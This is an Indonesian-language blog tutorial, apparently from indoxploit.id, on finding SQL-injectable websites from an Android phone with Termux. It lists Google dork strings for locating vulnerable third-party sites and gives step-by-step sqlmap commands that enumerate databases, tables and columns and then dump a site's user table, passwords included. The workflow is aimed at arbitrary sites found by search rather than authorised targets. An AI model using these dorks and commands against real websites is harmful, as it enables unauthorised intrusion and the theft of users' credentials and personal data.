Cara Mencari Bug Website di Hp Android Termux

Dalam tutorial kali ini kita akan membahas bagaimana cara mencari celah atau bug website di Hp Android tanpa root.

Bug, merupakan suatu kesalahan atau cacat pada sebuah software atau hardware yang menyebabkan software atau hardware tersebut tidak jalan sebagaimana mestinya.

Mencari Website yang Vulnerability

Ada beberapa tool yang dapat di gunakan untuk menemuka web yang vuln. dalam tutorial ini saya akan menggunakan Google Dork dan tool Droidbug QSL.

Oke langsung ke tahap pertama:

1. Buka web broser kalian dan masukan Dork di bawah ini di menu pencarian browser:

  • add.php?bookid=
  • add_cart.php?num=
  • addcart.php?
  • addItem.php
  • add-to-cart.php?ID=
  • inurl:gallery.php?id=
  • about.php?cartID=
  • accinfo.php?cartId=
  • acclogin.php?cartID=
BACA  Cara Daftar Wifi ID Semua Provider (Telkomsel, Indosat, XL) via SMS

Maka akan tampil beberapa website yang Vulnerability.

2. Langkah selanjutnya kita akan menguji apakah web tersebut benar2 vulnerability atau terdapat celah keamanannya:

  • Download dan instal aplikasi Droidbus QSL di Hp Android Anda.
  • Setelah terinstal, buka dan pilih menu By URL,s maka akan muncul kolom untuk memasukan link.
  • Copy dan paste link website yang kamu dapat tadi di browser kamu dari Google Dork dan klik SCAN. Biarka proses scaning selesai, jika vuln maka akan ada keterangan Vulnerability berwarna hijau.

Oke, kita lanjut ke Langkah selanjutnya:

SQL Injection Menggunakan SQLmap

Sqlmap adalah perangkat lunak open source. Sqlmap adalah salah satu tool pengujian penetrasi paling kuat yang tersedia di internet. Ini adalah salah satu alat favorit saya dan dikodekan dengan python. Anda dapat menggunakan sqlmap untuk mengeksploitasi dan mengekstrak informasi database dari situs web yang rentan SQL.

Cara mengunduh dan menginstal Sqlmap di Android Termux

Persyaratan

Termux:
Download Link
Hacker Keyboard
Download Link

SQL map GitHub https://github.com/sqlmapproject/sqlmap.git

Prosedur

BACA  Cara download foto Instagram termux
1: Buka Termux dan ketik perintah pkg update dan tekan Enter.
  • Sekarang install Python2 dengan perintah pkg install python2 dan tekan Enter
  • Install Git dengan perintah pkg install git
2: Sekarang kita akan mengkloning Sqlmap
  • Ketik perintah git clone https://github.com/sqlmapproject/sqlmap.git dan tekan Enter
  • Tunggu hingga download selesai (59MB). Pastikan Anda memiliki koneksi internet yang baik dan stabil kecuali ada kesalahan. Setelah selesai mengunduh.
3: Setelah menyelesaikan pengunduhan
  • Ketik perintah ls untuk melihat daftar file yang tersedia di sana.
  • Ketik perintah cd sqlmap dan tekan Enter. Sekarang Anda berada di direktori sqlmap
  • Ketik perintah ls untuk melihat daftar file yang tersedia di sana.
4: Sekarang kita akan menginstal Sqlmap
  • Ketikkan perintah python2 sqlmap.py
5: Bagaimana cara menggunakan?
  • Ketik perintah python2 sqlmap.py -u (url) dan tekan Enter. Di sini (url) adalah tautan atau situs web Anda. Dalam tangkapan layar ini saya akan mengujinya di situs web saya sendiri.
BACA  Cara membuka pesan WA tanpa ketahuan pengiriman pesan

6. Mencari Celah atau Bug Website

Sampai pada bagian untuk menemukan buak bug website.

Ada beberapa perintah SQL map untuk menemukan data penting website yang akan kita xploit:

  1.  “–dbs” untuk menemukan database tertentu. untuk menjalankannya cukup masukan perintah
    $ python2 sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --dbs
  2. –tables” dan “-D“membuka tabel yang ada dalam database. contoh:
    $ python2 sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --tables -D namawwbtarget
  3. –colums” untuk mendapatkan kolom sebuah tabel misalnya berisi : id, password, text dll.
    $ python2 sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --columns -D namawebtarget -T user
  4. “–dump”, “-D” dan “-T” untuk membuka data yang ada dalam tabel. masukanbperintah ini “contoh:”
    $ python sqlmap.py -u "http://www.webtarget.com/section.php?id=51" --dump -D namawbtarget -T user

Ok, sekian tutorial cara mencari kerentanan situs atau bug sebuah website dari saya. mohon maaf jika ada kesalahan, jangan sungkan untuk berkomentar. terima kasih…

Live Hacking

Admin website indoxploit.id

Tinggalkan Balasan